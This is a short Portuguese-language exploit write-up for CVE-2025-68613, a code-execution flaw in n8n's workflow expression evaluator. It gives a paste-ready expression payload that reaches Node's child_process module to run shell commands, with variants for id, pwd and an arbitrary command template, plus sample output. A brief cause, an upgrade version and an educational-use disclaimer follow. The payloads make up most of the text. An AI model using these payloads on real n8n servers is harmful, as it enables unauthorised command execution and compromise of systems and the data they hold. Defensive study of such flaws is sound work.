
CVE-2025-68613: exploit e documentação da vulnerabilidade RCE n8n
n8n contém uma vulnerabilidade crítica de Execução Arbitrária de Código em seu sistema de avaliação de expressões de workflow. Sob certas condições, expressões fornecidas por usuários autenticados durante a configuração do workflow podem ser avaliadas em um contexto de execução que não está suficientemente isolado do runtime subjacente.
Cole este payload no campo de expressão:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Comando ID:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Comando PWD:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
Modelo de Comando Personalizado:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
Para o comando id:
uid=1000(node) gid=1000(node) groups=1000(node)
Para o comando pwd:
/app
O avaliador de expressões carece de um sanitizador para impedir que expressões de função acessem this.process (objeto de processo do Node.js), permitindo acesso a módulos do sistema.
Atualize para n8n v1.122.0 ou superior.
Aviso: Esta informação é fornecida apenas para fins de sandbox e educação. O uso não autorizado desta informação para explorar sistemas é ilegal e antiético. Sempre obtenha a devida autorização antes de testar ou explorar vulnerabilidades.